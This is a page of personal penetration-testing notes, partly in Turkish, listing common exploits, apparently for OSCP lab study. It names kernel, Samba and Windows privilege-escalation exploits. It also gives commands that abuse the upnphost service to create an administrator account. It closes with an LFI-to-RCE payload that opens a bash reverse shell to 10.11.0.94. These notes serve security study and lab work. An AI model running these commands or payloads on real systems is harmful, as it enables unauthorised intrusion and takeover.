messy security notes
  • security is an illision
  • Useful Blog Links
  • Windows
    • ad-101
    • MS17-010
    • SMB
    • Post Exploitation Tricks
    • DCOM/RPC
    • Basic Commands
    • SMB Enumeration
  • Linux
    • SUID Set Edilmiş servicectl Abuse Etme
    • sudoers dosyası bozulursa?
    • SSH Welcome Message and Banner
    • pkexec ve pkttyagent
    • vipw , vigr , visudo
    • IP Forwarding
    • İki NIC Arasında Port Yönlendirme
    • tasksel
    • LAMP
    • Find All SUID Bit
    • Linux Operatorler
    • IFS
    • Ssh Public Key Tricks
    • Local & Remote Port Forwarding
    • Linux Priv Esc
    • Static IP
  • POST EXPLOITATION
    • from external network to domain admin
    • post exp 2
  • OSCP
  • Temel Komutlar ve Araçlar
  • Zayıf Servisler
  • Örnek Bir Senaryo
  • Parola Saldırıları
  • ms17-010 python exploit
  • Full Interactive Shell
  • Notes*
  • Apache James Server 2.3.2 Exploit
  • windows exploit suggester
  • FreeBsd and Some PHP tricks
  • fundamental blog
  • Metasoloit & Meterpreter & msfvenom
  • at-tftp server 1.9
  • Tunneling and Forwarding
  • Common Exploits
  • Windows Servisler
  • Execute process as another user
  • Teorik
    • Authentication and Authorization
    • Kullanıcı Hesap Türleri ve Hakları
    • Kerberos
  • SYSTEM
    • Apache2
    • Bind9 Log
    • apache - basic auth - proxy
  • Buffer Overflow - BOF
    • BOF - Stack Based
    • BoF Links
  • BASH SCRIPTING
    • Samples
  • keepnote
  • Docker
    • Docker
  • Misc
    • 50-cloud-init.yaml
Powered by GitBook
On this page
  • Samba trans2open Overflow (Linux x86) / 10.11.1.22
  • dirty cow exploit
  • Linux Kernel 2.6.39 < 3.2.2 - 'Mempodipper' Local Privilege Escalation
  • Webdav exploit
  • linux/samba/trans2open (Samba 2.2.x) - exploitdb-link Samba < 2.2.8
  • Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046) win7/winserver2008 ve öncesi oslarda çalışıyor. - afd.sys Privilege Escalation (MS14-040), PoC
  • accesschk.exe
  • ms11-080

Was this helpful?

Common Exploits

Samba trans2open Overflow (Linux x86) / 10.11.1.22

This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8.

dirty cow exploit

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)

Linux Kernel 2.6.39 < 3.2.2 - 'Mempodipper' Local Privilege Escalation

Webdav exploit

windows/iis/iis_webdav_upload_asp

linux/samba/trans2open (Samba 2.2.x) - exploitdb-link Samba < 2.2.8

samba servisine yönelik kullanılacak exploit

Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046) win7/winserver2008 ve öncesi oslarda çalışıyor. - afd.sys Privilege Escalation (MS14-040), PoC

accesschk.exe

# sc config upnphost binpath= "net eviluser testxlab Password1 /add"
# sc config upnphost binpath= "net localgroup Administrators eviluser /add"
# sc stop upnphost
# sc start upnphost

Servisin Config Ayarlarını Görmek için

# sc qc upnphost

Servislerin izin kontrolleri

# accesschk-xp.exe  -uwcqv "Authenticated Users" * /accepteula

kullanımı yazılacak

Notlar

Windows xp, xp sp1, sp2 gibi sistemlerde upnphost servisi üzerinden hak ve yetki yükseltebilirsin.

LFI to RCE

POST /section.php?page=php://input%00

[HTTP POST DATA] 
<?php echo shell_exec("bash -i >& /dev/tcp/10.11.0.94/443 0>&1 2>&1"); ?>

ms11-080

##

PreviousTunneling and ForwardingNextWindows Servisler

Last updated 5 years ago

Was this helpful?

https://hackingandsecurity.blogspot.com/2016/05/ms11-080-privilege-escalation-windows.htmlhackingandsecurity.blogspot.com